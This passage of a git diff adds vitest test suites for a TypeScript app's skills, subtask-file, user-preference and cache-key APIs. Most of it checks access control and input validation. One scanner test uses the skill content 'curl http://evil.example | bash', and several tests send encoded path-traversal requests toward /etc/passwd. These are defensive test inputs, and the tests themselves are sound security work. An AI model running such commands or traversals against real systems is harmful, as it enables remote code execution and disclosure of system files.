res.type(extname(filePath) || 'application/octet-stream'); res.send(readFileSync(filePath)); } catch (err) { + if (isPathEscapeError(err)) { + res.status(400).json({ error: 'Path escapes workspace' }); + return; + } logger.error(`Shared file raw API error: ${err}`); res.status(500).json({ error: 'Failed to read file' }); } diff --git a/src/bridge/skills-api.test.ts b/src/bridge/skills-api.test.ts new file mode 100644 index 0000000..ca99f33 --- /dev/null +++ b/src/bridge/skills-api.test.ts @@ -0,0 +1,289 @@ +import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest'; +import express from 'express'; +import request from 'supertest'; +import { mkdtempSync, rmSync, mkdirSync, writeFileSync, existsSync, readFileSync } from 'fs'; +import { join } from 'path'; +import { tmpdir } from 'os'; +import { SkillCatalog } from '../engine/skills.js'; +import { mountSkillsApi } from './skills-api.js'; + +vi.mock('./skills-git-install.js', () => ({ + handleInstallFromUrl: vi.fn(() => (_req: unknown, res: { json: (b: object) => void }) => { + res.json({ installedVia: 'mock' }); + }), +})); + +const SKILL_MD = (name: string) => + `---\nname: ${name}\ndescription: a ${name} skill\n---\n\n# ${name}\nbody`; + +let root: string; +let systemDir: string; +let userRoot: string; + +function makeCatalog(): SkillCatalog { + return new SkillCatalog(systemDir, userRoot); +} + +function makeApp(catalog: SkillCatalog, user?: { id: string; role?: string }): express.Application { + const app = express(); + if (user) { + app.use((req, _res, next) => { + (req as unknown as { user: typeof user }).user = user; + next(); + }); + } + mountSkillsApi(app, { skillCatalog: catalog, authActive: false }); + return app; +} + +function addUserSkill(userId: string, name: string): void { + const dir = join(userRoot, userId, 'skills', name); + mkdirSync(dir, { recursive: true }); + writeFileSync(join(dir, 'SKILL.md'), SKILL_MD(name)); +} + +beforeEach(() => { + root = mkdtempSync(join(tmpdir(), 'skills-api-test-')); + systemDir = join(root, 'system-skills'); + userRoot = join(root, 'users'); + mkdirSync(systemDir, { recursive: true }); + const sysSkill = join(systemDir, 'sys-skill'); + mkdirSync(sysSkill, { recursive: true }); + writeFileSync(join(sysSkill, 'SKILL.md'), SKILL_MD('sys-skill')); +}); + +afterEach(() => { + rmSync(root, { recursive: true, force: true }); +}); + +describe('GET /api/skills', () => { + it('lists system and user skills merged', async () => { + addUserSkill('user-1', 'my-skill'); + const res = await request(makeApp(makeCatalog(), { id: 'user-1' })).get('/api/skills'); + expect(res.status).toBe(200); + const names = res.body.skills.map((s: { name: string }) => s.name).sort(); + expect(names).toEqual(['my-skill', 'sys-skill']); + }); + + it('filters by scope', async () => { + addUserSkill('user-1', 'my-skill'); + const res = await request(makeApp(makeCatalog(), { id: 'user-1' })) + .get('/api/skills?scope=user'); + expect(res.body.skills.map((s: { name: string }) => s.name)).toEqual(['my-skill']); + }); + + it('rejects an unknown scope', async () => { + const res = await request(makeApp(makeCatalog(), { id: 'user-1' })) + .get('/api/skills?scope=evil'); + expect(res.status).toBe(400); + }); + + it('does not show another user\'s skills', async () => { + addUserSkill('user-2', 'their-skill'); + const res = await request(makeApp(makeCatalog(), { id: 'user-1' })).get('/api/skills'); + expect(res.body.skills.map((s: { name: string }) => s.name)).toEqual(['sys-skill']); + }); +}); + +describe('GET /api/skills/:name', () => { + it('returns detail with content, files and scan findings', async () => { + const res = await request(makeApp(makeCatalog(), { id: 'user-1' })).get('/api/skills/sys-skill'); + expect(res.status).toBe(200); + expect(res.body.name).toBe('sys-skill'); + expect(res.body.source).toBe('system'); + expect(res.body.content).toContain('body'); + expect(res.body.files).toContain('SKILL.md'); + expect(res.body).toHaveProperty('maxSeverity'); + }); + + it('rejects names with path characters as invalid', async () => { + const res = await request(makeApp(makeCatalog(), { id: 'user-1' })) + .get('/api/skills/..%2F..%2Fetc'); + expect(res.status).toBe(400); + }); + + it('returns 404 for an unknown skill', async () => { + const res = await request(makeApp(makeCatalog(), { id: 'user-1' })).get('/api/skills/nope'); + expect(res.status).toBe(404); + }); +}); + +describe('POST /api/skills/install-from-url routing', () => { + it('routes to the git-install handler instead of the :name route', async () => { + const res = await request(makeApp(makeCatalog(), { id: 'user-1' })) + .post('/api/skills/install-from-url') + .send({ url: 'https://example.com/repo.git' }); + expect(res.status).toBe(200); + expect(res.body.installedVia).toBe('mock'); + }); +}); + +describe('POST /api/skills (create)', () => { + const create = (app: express.Application, body: object) => + request(app).post('/api/skills').send(body); + + it('creates a user skill in directory format', async () => { + const catalog = makeCatalog(); + const res = await create(makeApp(catalog, { id: 'user-1' }), { + name: 'new-skill', + scope: 'user', + content: SKILL_MD('new-skill'), + }); + expect(res.status).toBe(201); + expect(readFileSync(join(userRoot, 'user-1', 'skills', 'new-skill', 'SKILL.md'), 'utf-8')) + .toContain('new-skill'); + }); + + it.each([ + ['uppercase', 'BadName'], + ['traversal', '../escape'], + ['empty', ''], + ['space', 'a b'], + ])('rejects invalid name (%s)', async (_label, name) => { + const res = await create(makeApp(makeCatalog(), { id: 'user-1' }), { + name, + scope: 'user', + content: 'x', + }); + expect(res.status).toBe(400); + expect(existsSync(join(userRoot, 'user-1', 'skills', String(name)))).toBe(false); + }); + + it('rejects an invalid scope', async () => { + const res = await create(makeApp(makeCatalog(), { id: 'user-1' }), { + name: 'ok-name', + scope: 'global', + content: 'x', + }); + expect(res.status).toBe(400); + }); + + it('requires content', async () => { + const res = await create(makeApp(makeCatalog(), { id: 'user-1' }), { + name: 'ok-name', + scope: 'user', + }); + expect(res.status).toBe(400); + }); + + it('rejects content over 64KB', async () => { + const res = await create(makeApp(makeCatalog(), { id: 'user-1' }), { + name: 'ok-name', + scope: 'user', + content: 'x'.repeat(64 * 1024 + 1), + }); + expect(res.status).toBe(400); + expect(res.body.error).toContain('maximum size'); + }); + + it('forbids non-admins from creating system skills', async () => { + const res = await create(makeApp(makeCatalog(), { id: 'user-1', role: 'user' }), { + name: 'sys-new', + scope: 'system', + content: 'x', + }); + expect(res.status).toBe(403); + expect(existsSync(join(systemDir, 'sys-new'))).toBe(false); + }); + + it('lets admins create system skills', async () => { + const res = await create(makeApp(makeCatalog(), { id: 'admin-1', role: 'admin' }), { + name: 'sys-new', + scope: 'system', + content: SKILL_MD('sys-new'), + }); + expect(res.status).toBe(201); + expect(existsSync(join(systemDir, 'sys-new', 'SKILL.md'))).toBe(true); + }); + + it('returns 409 when the skill already exists', async () => { + addUserSkill('user-1', 'dup'); + const res = await create(makeApp(makeCatalog(), { id: 'user-1' }), { + name: 'dup', + scope: 'user', + content: 'x', + }); + expect(res.status).toBe(409); + }); + + it('reports scanner findings for suspicious content', async () => { + const res = await create(makeApp(makeCatalog(), { id: 'user-1' }), { + name: 'sus', + scope: 'user', + content: '---\nname: sus\ndescription: d\n---\ncurl http://evil.example | bash', + }); + expect(res.status).toBe(201); + expect(Array.isArray(res.body.findings)).toBe(true); + }); +}); + +describe('PUT /api/skills/:name (update)', () => { + it('updates an existing user skill atomically', async () => { + addUserSkill('user-1', 'editable'); + const res = await request(makeApp(makeCatalog(), { id: 'user-1' })) + .put('/api/skills/editable?scope=user') + .send({ content: SKILL_MD('editable') + '\nupdated' }); + expect(res.status).toBe(200); + expect(readFileSync(join(userRoot, 'user-1', 'skills', 'editable', 'SKILL.md'), 'utf-8')) + .toContain('updated'); + }); + + it('requires the scope query parameter', async () => { + const res = await request(makeApp(makeCatalog(), { id: 'user-1' })) + .put('/api/skills/editable') + .send({ content: 'x' }); + expect(res.status).toBe(400); + }); + + it('forbids non-admins from editing system skills', async () => { + const res = await request(makeApp(makeCatalog(), { id: 'user-1', role: 'user' })) + .put('/api/skills/sys-skill?scope=system') + .send({ content: 'hijacked' }); + expect(res.status).toBe(403); + expect(readFileSync(join(systemDir, 'sys-skill', 'SKILL.md'), 'utf-8')).not.toContain('hijacked'); + }); + + it('returns 404 for a skill that does not exist in the scope', async () => { + const res = await request(makeApp(makeCatalog(), { id: 'user-1' })) + .put('/api/skills/ghost?scope=user') + .send({ content: 'x' }); + expect(res.status).toBe(404); + }); + + it('rejects invalid names before touching the filesystem', async () => { + const res = await request(makeApp(makeCatalog(), { id: 'user-1' })) + .put('/api/skills/Bad..Name?scope=user') + .send({ content: 'x' }); + expect(res.status).toBe(400); + }); +}); + +describe('DELETE /api/skills/:name', () => { + it('deletes a user skill directory', async () => { + addUserSkill('user-1', 'doomed'); + const res = await request(makeApp(makeCatalog(), { id: 'user-1' })) + .delete('/api/skills/doomed?scope=user'); + expect(res.status).toBe(200); + expect(existsSync(join(userRoot, 'user-1', 'skills', 'doomed'))).toBe(false); + }); + + it('forbids non-admins from deleting system skills', async () => { + const res = await request(makeApp(makeCatalog(), { id: 'user-1', role: 'user' })) + .delete('/api/skills/sys-skill?scope=system'); + expect(res.status).toBe(403); + expect(existsSync(join(systemDir, 'sys-skill'))).toBe(true); + }); + + it('lets admins delete system skills', async () => { + const res = await request(makeApp(makeCatalog(), { id: 'admin-1', role: 'admin' })) + .delete('/api/skills/sys-skill?scope=system'); + expect(res.status).toBe(200); + expect(existsSync(join(systemDir, 'sys-skill'))).toBe(false); + }); + + it('returns 404 when nothing was deleted', async () => { + const res = await request(makeApp(makeCatalog(), { id: 'user-1' })) + .delete('/api/skills/ghost?scope=user'); + expect(res.status).toBe(404); + }); +}); diff --git a/src/bridge/subtask-files-api.test.ts b/src/bridge/subtask-files-api.test.ts new file mode 100644 index 0000000..315da5c --- /dev/null +++ b/src/bridge/subtask-files-api.test.ts @@ -0,0 +1,183 @@ +import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest'; +import express from 'express'; +import request from 'supertest'; +import { mkdtempSync, rmSync, mkdirSync, writeFileSync } from 'fs'; +import { join } from 'path'; +import { tmpdir } from 'os'; +import { mountSubtaskFilesApi } from './subtask-files-api.js'; +import type { Repository } from '../db/repository.js'; + +let taskWs: string; +let subWs: string; + +function makeRepo(overrides: Partial = {}): Repository { + return { + getLocalTask: vi.fn().mockResolvedValue({ + id: 1, + ownerId: 'user-1', + visibility: 'private', + workspacePath: taskWs, + }), + getJob: vi.fn().mockResolvedValue({ id: 'job-9', worktreePath: subWs }), + ...overrides, + } as unknown as Repository; +} + +function makeUser(overrides: Partial = {}): Express.User { + return { + id: 'user-1', + email: 'u@example.com', + name: 'User One', + avatarUrl: null, + role: 'user', + status: 'active', + orgIds: [], + defaultVisibility: 'private', + defaultVisibilityOrgId: null, + ...overrides, + }; +} + +function makeApp(repo: Repository, user?: Express.User): express.Application { + const app = express(); + if (user) { + app.use((req, _res, next) => { + (req as unknown as { user: Express.User }).user = user; + next(); + }); + } + mountSubtaskFilesApi(app, repo); + return app; +} + +beforeEach(() => { + taskWs = mkdtempSync(join(tmpdir(), 'subtask-files-task-')); + subWs = join(taskWs, 'subtasks', '1'); + mkdirSync(join(subWs, 'output'), { recursive: true }); + mkdirSync(join(subWs, 'logs'), { recursive: true }); + writeFileSync(join(subWs, 'output', 'result.md'), '# result'); + writeFileSync(join(subWs, 'logs', 'activity.log'), 'log line'); + writeFileSync(join(subWs, 'secret-sibling.txt'), 'outside reachable?'); +}); + +afterEach(() => { + rmSync(taskWs, { recursive: true, force: true }); +}); + +describe('GET /api/local/tasks/:id/subtasks/:jobId/files (listing)', () => { + it('lists files grouped by category with output as legacy files', async () => { + const app = makeApp(makeRepo(), makeUser()); + const res = await request(app).get('/api/local/tasks/1/subtasks/job-9/files'); + expect(res.status).toBe(200); + expect(res.body.files).toEqual(['result.md']); + expect(res.body.categories).toEqual({ + output: ['result.md'], + logs: ['activity.log'], + }); + }); + + it('rejects an invalid task id with 400', async () => { + const app = makeApp(makeRepo(), makeUser()); + const res = await request(app).get('/api/local/tasks/banana/subtasks/job-9/files'); + expect(res.status).toBe(400); + }); + + it('returns 404 for a missing task', async () => { + const repo = makeRepo({ getLocalTask: vi.fn().mockResolvedValue(null) } as Partial); + const app = makeApp(repo, makeUser()); + const res = await request(app).get('/api/local/tasks/1/subtasks/job-9/files'); + expect(res.status).toBe(404); + }); + + it('returns 404 when the viewer cannot see the task (private, non-owner)', async () => { + const app = makeApp(makeRepo(), makeUser({ id: 'someone-else' })); + const res = await request(app).get('/api/local/tasks/1/subtasks/job-9/files'); + expect(res.status).toBe(404); + }); + + it('returns 404 when the job has no worktree', async () => { + const repo = makeRepo({ getJob: vi.fn().mockResolvedValue(null) } as Partial); + const app = makeApp(repo, makeUser()); + const res = await request(app).get('/api/local/tasks/1/subtasks/job-9/files'); + expect(res.status).toBe(404); + expect(res.body.error).toBe('Subtask not found'); + }); + + it('returns 404 when the subtask worktree lives outside the task workspace', async () => { + const foreign = mkdtempSync(join(tmpdir(), 'foreign-ws-')); + try { + const repo = makeRepo({ + getJob: vi.fn().mockResolvedValue({ id: 'job-9', worktreePath: foreign }), + } as Partial); + const app = makeApp(repo, makeUser()); + const res = await request(app).get('/api/local/tasks/1/subtasks/job-9/files'); + expect(res.status).toBe(404); + } finally { + rmSync(foreign, { recursive: true, force: true }); + } + }); +}); + +describe('GET /api/local/tasks/:id/subtasks/:jobId/files/* (content)', () => { + it('serves a file inside the subtask worktree', async () => { + const app = makeApp(makeRepo(), makeUser()); + const res = await request(app).get('/api/local/tasks/1/subtasks/job-9/files/output/result.md'); + expect(res.status).toBe(200); + expect(res.text).toBe('# result'); + }); + + it('lists directory contents for a directory path', async () => { + const app = makeApp(makeRepo(), makeUser()); + const res = await request(app).get('/api/local/tasks/1/subtasks/job-9/files/output'); + expect(res.status).toBe(200); + expect(res.body.files).toEqual(['result.md']); + }); + + it('denies path traversal out of the worktree with 403', async () => { + const app = makeApp(makeRepo(), makeUser()); + const res = await request(app).get( + '/api/local/tasks/1/subtasks/job-9/files/output/..%2F..%2F..%2Fetc%2Fpasswd', + ); + expect(res.status).toBe(403); + }); + + it('denies encoded traversal to a sibling directory sharing the prefix', async () => { + // `-x` must not pass the startsWith check. + mkdirSync(`${subWs}-x`, { recursive: true }); + writeFileSync(join(`${subWs}-x`, 'leak.txt'), 'leak'); + const app = makeApp(makeRepo(), makeUser()); + const res = await request(app).get( + '/api/local/tasks/1/subtasks/job-9/files/..%2F1-x%2Fleak.txt', + ); + expect(res.status).toBe(403); + }); + + it('returns 404 for a file that does not exist', async () => { + const app = makeApp(makeRepo(), makeUser()); + const res = await request(app).get('/api/local/tasks/1/subtasks/job-9/files/output/nope.txt'); + expect(res.status).toBe(404); + expect(res.body.error).toBe('File not found'); + }); + + it('returns 404 when the viewer cannot see the task', async () => { + const app = makeApp(makeRepo(), makeUser({ id: 'someone-else' })); + const res = await request(app).get('/api/local/tasks/1/subtasks/job-9/files/output/result.md'); + expect(res.status).toBe(404); + }); + + it('allows org members to fetch files of an org-visible task', async () => { + const repo = makeRepo({ + getLocalTask: vi.fn().mockResolvedValue({ + id: 1, + ownerId: 'owner-x', + visibility: 'org', + visibilityScopeOrgId: 'org-a', + workspacePath: taskWs, + }), + } as Partial); + const app = makeApp(repo, makeUser({ id: 'member', orgIds: ['org-a'] })); + const res = await request(app).get('/api/local/tasks/1/subtasks/job-9/files/output/result.md'); + expect(res.status).toBe(200); + expect(res.text).toBe('# result'); + }); +}); diff --git a/src/bridge/users-api.test.ts b/src/bridge/users-api.test.ts new file mode 100644 index 0000000..1743f34 --- /dev/null +++ b/src/bridge/users-api.test.ts @@ -0,0 +1,207 @@ +import { describe, it, expect, beforeEach, vi } from 'vitest'; +import express from 'express'; +import request from 'supertest'; +import { mountUsersApi } from './users-api.js'; +import type { Repository } from '../db/repository.js'; + +function makeRepo(overrides: Partial = {}): Repository { + return { + listUserGiteaOrgs: vi.fn().mockReturnValue([]), + listUserLocalOrgs: vi.fn().mockReturnValue([]), + updateUser: vi.fn(), + ...overrides, + } as unknown as Repository; +} + +function makeUser(overrides: Partial = {}): Express.User { + return { + id: 'user-1', + email: 'u@example.com', + name: 'User One', + avatarUrl: null, + role: 'user', + status: 'active', + orgIds: [], + defaultVisibility: 'private', + defaultVisibilityOrgId: null, + ...overrides, + }; +} + +/** Build an app with authActive=false and an optionally injected user. */ +function makeApp(repo: Repository, user?: Express.User): express.Application { + const app = express(); + if (user) { + app.use((req, _res, next) => { + (req as unknown as { user: Express.User }).user = user; + next(); + }); + } + mountUsersApi(app, repo, false); + return app; +} + +describe('Users API', () => { + let repo: Repository; + + beforeEach(() => { + repo = makeRepo(); + }); + + // ------------------------------------------------------------------- + // GET /api/users/me/orgs + // ------------------------------------------------------------------- + + describe('GET /api/users/me/orgs', () => { + it('returns 401 when no user is injected (authActive=false defensive path)', async () => { + const app = makeApp(repo); + const res = await request(app).get('/api/users/me/orgs'); + expect(res.status).toBe(401); + expect(res.body.error).toBe('Unauthorized'); + expect(repo.listUserGiteaOrgs).not.toHaveBeenCalled(); + }); + + it('returns 401 via requireAuth when authActive=true and unauthenticated', async () => { + const app = express(); + // Simulate passport being initialized but the session unauthenticated. + app.use((req, _res, next) => { + (req as unknown as { isAuthenticated: () => boolean }).isAuthenticated = () => false; + next(); + }); + mountUsersApi(app, repo, true); + const res = await request(app).get('/api/users/me/orgs'); + expect(res.status).toBe(401); + expect(res.body.error).toBe('Unauthorized'); + }); + + it('merges Gitea orgs and local orgs into one list', async () => { + vi.mocked(repo.listUserGiteaOrgs).mockReturnValue([ + { orgId: 'g1', orgName: 'gitea-org', fetchedAt: '2026-01-01T00:00:00Z' }, + ] as never); + vi.mocked(repo.listUserLocalOrgs).mockReturnValue([ + { orgId: 'l1', name: 'local-org' }, + ] as never); + const app = makeApp(repo, makeUser()); + + const res = await request(app).get('/api/users/me/orgs'); + + expect(res.status).toBe(200); + expect(res.body.orgs).toEqual([ + { orgId: 'g1', orgName: 'gitea-org', fetchedAt: '2026-01-01T00:00:00Z' }, + { orgId: 'l1', orgName: 'local-org', fetchedAt: '' }, + ]); + expect(repo.listUserGiteaOrgs).toHaveBeenCalledWith('user-1'); + expect(repo.listUserLocalOrgs).toHaveBeenCalledWith('user-1'); + }); + + it('returns an empty list when the user belongs to no orgs', async () => { + const app = makeApp(repo, makeUser()); + const res = await request(app).get('/api/users/me/orgs'); + expect(res.status).toBe(200); + expect(res.body.orgs).toEqual([]); + }); + }); + + // ------------------------------------------------------------------- + // PATCH /api/users/me/preferences + // ------------------------------------------------------------------- + + describe('PATCH /api/users/me/preferences', () => { + it('returns 401 when no user is injected', async () => { + const app = makeApp(repo); + const res = await request(app) + .patch('/api/users/me/preferences') + .send({ defaultVisibility: 'public' }); + expect(res.status).toBe(401); + expect(repo.updateUser).not.toHaveBeenCalled(); + }); + + it('rejects an unknown defaultVisibility value with 400', async () => { + const app = makeApp(repo, makeUser()); + const res = await request(app) + .patch('/api/users/me/preferences') + .send({ defaultVisibility: 'everyone' }); + expect(res.status).toBe(400); + expect(res.body.error).toBe('invalid defaultVisibility'); + expect(repo.updateUser).not.toHaveBeenCalled(); + }); + + it('rejects non-string defaultVisibility with 400', async () => { + const app = makeApp(repo, makeUser()); + const res = await request(app) + .patch('/api/users/me/preferences') + .send({ defaultVisibility: 42 }); + expect(res.status).toBe(400); + expect(repo.updateUser).not.toHaveBeenCalled(); + }); + + it('requires defaultVisibilityOrgId when defaultVisibility is "org"', async () => { + const app = makeApp(repo, makeUser({ orgIds: ['org-a'] })); + const res = await request(app) + .patch('/api/users/me/preferences') + .send({ defaultVisibility: 'org' }); + expect(res.status).toBe(400); + expect(res.body.error).toMatch(/default_visibility_org_id is required/); + expect(repo.updateUser).not.toHaveBeenCalled(); + }); + + it('rejects an org scope the user does not belong to', async () => { + const app = makeApp(repo, makeUser({ orgIds: ['org-a'] })); + const res = await request(app) + .patch('/api/users/me/preferences') + .send({ defaultVisibility: 'org', defaultVisibilityOrgId: 'org-b' }); + expect(res.status).toBe(400); + expect(res.body.error).toMatch(/must be one of your orgs/); + expect(repo.updateUser).not.toHaveBeenCalled(); + }); + + it('accepts defaultVisibility=org with an org the user belongs to', async () => { + const app = makeApp(repo, makeUser({ orgIds: ['org-a', 'org-b'] })); + const res = await request(app) + .patch('/api/users/me/preferences') + .send({ defaultVisibility: 'org', defaultVisibilityOrgId: 'org-b' }); + expect(res.status).toBe(200); + expect(res.body).toEqual({ ok: true }); + expect(repo.updateUser).toHaveBeenCalledWith('user-1', { + defaultVisibility: 'org', + defaultVisibilityOrgId: 'org-b', + }); + }); + + it('accepts defaultVisibility=private and nulls the org scope', async () => { + const app = makeApp(repo, makeUser()); + const res = await request(app) + .patch('/api/users/me/preferences') + .send({ defaultVisibility: 'private' }); + expect(res.status).toBe(200); + expect(repo.updateUser).toHaveBeenCalledWith('user-1', { + defaultVisibility: 'private', + defaultVisibilityOrgId: null, + }); + }); + + it('accepts defaultVisibility=public', async () => { + const app = makeApp(repo, makeUser()); + const res = await request(app) + .patch('/api/users/me/preferences') + .send({ defaultVisibility: 'public' }); + expect(res.status).toBe(200); + expect(repo.updateUser).toHaveBeenCalledWith('user-1', { + defaultVisibility: 'public', + defaultVisibilityOrgId: null, + }); + }); + + it('treats an empty body as a no-op preference update (200)', async () => { + const app = makeApp(repo, makeUser()); + const res = await request(app) + .patch('/api/users/me/preferences') + .send({}); + expect(res.status).toBe(200); + expect(repo.updateUser).toHaveBeenCalledWith('user-1', { + defaultVisibility: undefined, + defaultVisibilityOrgId: null, + }); + }); + }); +}); diff --git a/src/engine/context/cache-key.test.ts b/src/engine/context/cache-key.test.ts new file mode 100644 index 0000000..4cdc8d6 --- /dev/null +++ b/src/engine/context/cache-key.test.ts @@ -0,0 +1,175 @@ +import { describe, expect, it } from 'vitest'; +import { + buildGlobCacheKey, + buildGrepCacheKey, + buildOfficeCacheKey, + buildReadCacheKey, + buildWebFetchCacheKey, +} from './cache-key.js'; + +describe('buildReadCacheKey', () => { + it('builds a fully-specified key', () => { + expect(buildReadCacheKey({ + workspacePath: '/ws/1', + filePath: 'output/foo.ts', + offset: 10, + limit: 20, + byteOffset: 100, + byteLength: 200, + })).toBe('read:v1:/ws/1:output/foo.ts:10:20:100:200'); + }); + + it('normalizes undefined range params to "all"', () => { + expect(buildReadCacheKey({ workspacePath: '/ws', filePath: 'a.txt' })) + .toBe('read:v1:/ws:a.txt:all:all:all:all'); + }); + + it('keeps zero ranges distinct from undefined', () => { + const withZero = buildReadCacheKey({ workspacePath: '/ws', filePath: 'a.txt', offset: 0, limit: 0 }); + const withAll = buildReadCacheKey({ workspacePath: '/ws', filePath: 'a.txt' }); + expect(withZero).toBe('read:v1:/ws:a.txt:0:0:all:all'); + expect(withZero).not.toBe(withAll); + }); + + it('separates identical file paths in different workspaces', () => { + const a = buildReadCacheKey({ workspacePath: '/ws/a', filePath: 'same.txt' }); + const b = buildReadCacheKey({ workspacePath: '/ws/b', filePath: 'same.txt' }); + expect(a).not.toBe(b); + }); + + it('separates different range slices of the same file', () => { + const a = buildReadCacheKey({ workspacePath: '/ws', filePath: 'f', offset: 1, limit: 10 }); + const b = buildReadCacheKey({ workspacePath: '/ws', filePath: 'f', offset: 2, limit: 10 }); + expect(a).not.toBe(b); + }); + + it('handles unicode file paths', () => { + expect(buildReadCacheKey({ workspacePath: '/ws', filePath: 'output/日本語ファイル.md' })) + .toBe('read:v1:/ws:output/日本語ファイル.md:all:all:all:all'); + }); +}); + +describe('buildGrepCacheKey', () => { + it('builds a fully-specified key with pattern last', () => { + expect(buildGrepCacheKey({ + workspacePath: '/ws', + pattern: 'foo.*bar', + path: 'src', + glob: '*.ts', + })).toBe('grep:v1:/ws:src:*.ts:foo.*bar'); + }); + + it('defaults path to "." and glob to "*"', () => { + expect(buildGrepCacheKey({ workspacePath: '/ws', pattern: 'x' })) + .toBe('grep:v1:/ws:.:*:x'); + }); + + it('keeps patterns containing colons stable (pattern is the final segment)', () => { + expect(buildGrepCacheKey({ workspacePath: '/ws', pattern: 'a:b:c' })) + .toBe('grep:v1:/ws:.:*:a:b:c'); + }); + + it('distinguishes same pattern under different globs', () => { + const a = buildGrepCacheKey({ workspacePath: '/ws', pattern: 'p', glob: '*.ts' }); + const b = buildGrepCacheKey({ workspacePath: '/ws', pattern: 'p', glob: '*.js' }); + expect(a).not.toBe(b); + }); +}); + +describe('buildGlobCacheKey', () => { + it('builds key with explicit path', () => { + expect(buildGlobCacheKey({ workspacePath: '/ws', pattern: '**/*.ts', path: 'src' })) + .toBe('glob:v1:/ws:src:**/*.ts'); + }); + + it('defaults path to "."', () => { + expect(buildGlobCacheKey({ workspacePath: '/ws', pattern: '*.md' })) + .toBe('glob:v1:/ws:.:*.md'); + }); + + it('distinguishes glob from grep keys for similar args', () => { + const glob = buildGlobCacheKey({ workspacePath: '/ws', pattern: 'p' }); + const grep = buildGrepCacheKey({ workspacePath: '/ws', pattern: 'p' }); + expect(glob).not.toBe(grep); + }); +}); + +describe('buildWebFetchCacheKey', () => { + it('lower-cases scheme and host', () => { + expect(buildWebFetchCacheKey({ url: 'HTTPS://Example.COM/Path' })) + .toBe('webfetch:v1:https://example.com/Path'); + }); + + it('drops URL fragments', () => { + expect(buildWebFetchCacheKey({ url: 'https://example.com/page#section-2' })) + .toBe('webfetch:v1:https://example.com/page'); + }); + + it('preserves the query string', () => { + expect(buildWebFetchCacheKey({ url: 'https://example.com/search?q=a&b=2' })) + .toBe('webfetch:v1:https://example.com/search?q=a&b=2'); + }); + + it('normalizes bare host and trailing-slash host to the same key', () => { + const bare = buildWebFetchCacheKey({ url: 'https://example.com' }); + const slash = buildWebFetchCacheKey({ url: 'https://example.com/' }); + expect(bare).toBe(slash); + }); + + it('preserves path case (only scheme/host are case-insensitive)', () => { + const a = buildWebFetchCacheKey({ url: 'https://example.com/A' }); + const b = buildWebFetchCacheKey({ url: 'https://example.com/a' }); + expect(a).not.toBe(b); + }); + + it('keys invalid URLs on themselves', () => { + expect(buildWebFetchCacheKey({ url: 'not a url' })) + .toBe('webfetch:v1:not a url'); + expect(buildWebFetchCacheKey({ url: '' })) + .toBe('webfetch:v1:'); + }); + + it('treats same URL with different fragments as the same entry', () => { + const a = buildWebFetchCacheKey({ url: 'https://x.test/p#one' }); + const b = buildWebFetchCacheKey({ url: 'https://x.test/p#two' }); + expect(a).toBe(b); + }); +}); + +describe('buildOfficeCacheKey', () => { + it('builds key with explicit range', () => { + expect(buildOfficeCacheKey({ + workspacePath: '/ws', + toolName: 'ReadExcel', + filePath: 'input/book.xlsx', + range: 'sheet=Sheet1;rows=1-100', + })).toBe('office:v1:ReadExcel:/ws:input/book.xlsx:sheet=Sheet1;rows=1-100'); + }); + + it('defaults range to "all"', () => { + expect(buildOfficeCacheKey({ workspacePath: '/ws', toolName: 'ReadPdf', filePath: 'a.pdf' })) + .toBe('office:v1:ReadPdf:/ws:a.pdf:all'); + }); + + it('separates same file across different office tools', () => { + const pdf = buildOfficeCacheKey({ workspacePath: '/ws', toolName: 'ReadPdf', filePath: 'f' }); + const docx = buildOfficeCacheKey({ workspacePath: '/ws', toolName: 'ReadDocx', filePath: 'f' }); + expect(pdf).not.toBe(docx); + }); + + it('separates same tool+file across workspaces', () => { + const a = buildOfficeCacheKey({ workspacePath: '/ws/a', toolName: 'ReadPdf', filePath: 'f' }); + const b = buildOfficeCacheKey({ workspacePath: '/ws/b', toolName: 'ReadPdf', filePath: 'f' }); + expect(a).not.toBe(b); + }); +}); + +describe('cache key version prefix', () => { + it('every formula embeds the v1 version tag right after the tool tag', () => { + expect(buildReadCacheKey({ workspacePath: 'w', filePath: 'f' }).startsWith('read:v1:')).toBe(true); + expect(buildGrepCacheKey({ workspacePath: 'w', pattern: 'p' }).startsWith('grep:v1:')).toBe(true); + expect(buildGlobCacheKey({ workspacePath: 'w', pattern: 'p' }).startsWith('glob:v1:')).toBe(true); + expect(buildWebFetchCacheKey({ url: 'https://a.test/' }).startsWith('webfetch:v1:')).toBe(true); + expect(buildOfficeCacheKey({ workspacePath: 'w', toolName: 't', filePath: 'f' }).startsWith('office:v1:')).toBe(true); + }); +}); diff --git a/src/engine/context/invalidation.test.ts b/src/engine/context/invalidation.test.ts new file mode 100644 index 0000000..c08ca9b --- /dev/null +++ b/src/engine/context/invalidation.test.ts @@ -0,0 +1,44 @@ +import { describe, it, expect } from 'vitest'; +import type { ToolCall } from '../../llm/openai-compat.js'; +import { extractInvalidationTrigger } from './invalidation.js'; + +function call(name: string, args: unknown): ToolCall { + return { + id: 'tc-1', + type: 'function', + function: { + name, + arguments: typeof args === 'string' ? args : JSON.stringify(args), + }, + }; +} + +describe('extractInvalidationTrigger', () => { + it('invalidates the edited path for Edit and Write', () => { + expect(extractInvalidationTrigger(call('Edit', { file_path: '/ws/a.ts' }))) + .toEqual({ kind: 'path', path: '/ws/a.ts' }); + expect(extractInvalidationTrigger(call('Write', { file_path: 'out/b.md' }))) + .toEqual({ kind: 'path', path: 'out/b.md' }); + }); + + it('falls back to all_files when Edit args have no usable file_path', () => { + expect(extractInvalidationTrigger(call('Edit', {}))).toEqual({ kind: 'all_files' }); + expect(extractInvalidationTrigger(call('Edit', { file_path: '' }))).toEqual({ kind: 'all_files' }); + expect(extractInvalidationTrigger(call('Edit', { file_path: 42 }))).toEqual({ kind: 'all_files' }); + }); + + it('falls back to all_files when Edit args are unparseable JSON', () => { + expect(extractInvalidationTrigger(call('Write', '{not json'))).toEqual({ kind: 'all_files' }); + }); + + it('invalidates everything for Bash regardless of args', () => { + expect(extractInvalidationTrigger(call('Bash', { command: 'ls' }))).toEqual({ kind: 'all_files' }); + expect(extractInvalidationTrigger(call('Bash', '{broken'))).toEqual({ kind: 'all_files' }); + }); + + it('produces no trigger for read-only and unknown tools', () => { + for (const name of ['Read', 'Grep', 'Glob', 'WebFetch', 'NoSuchTool']) { + expect(extractInvalidationTrigger(call(name, { file_path: '/ws/a.ts' }))).toBeNull(); + } + }); +}); diff --git a/src/engine/context/token-estimate.test.ts b/src/engine/context/token-estimate.test.ts new file mode 100644 index 0000000..c534498 --- /dev/null +++ b/src/engine/context/token-estimate.test.ts @@ -0,0 +1,185 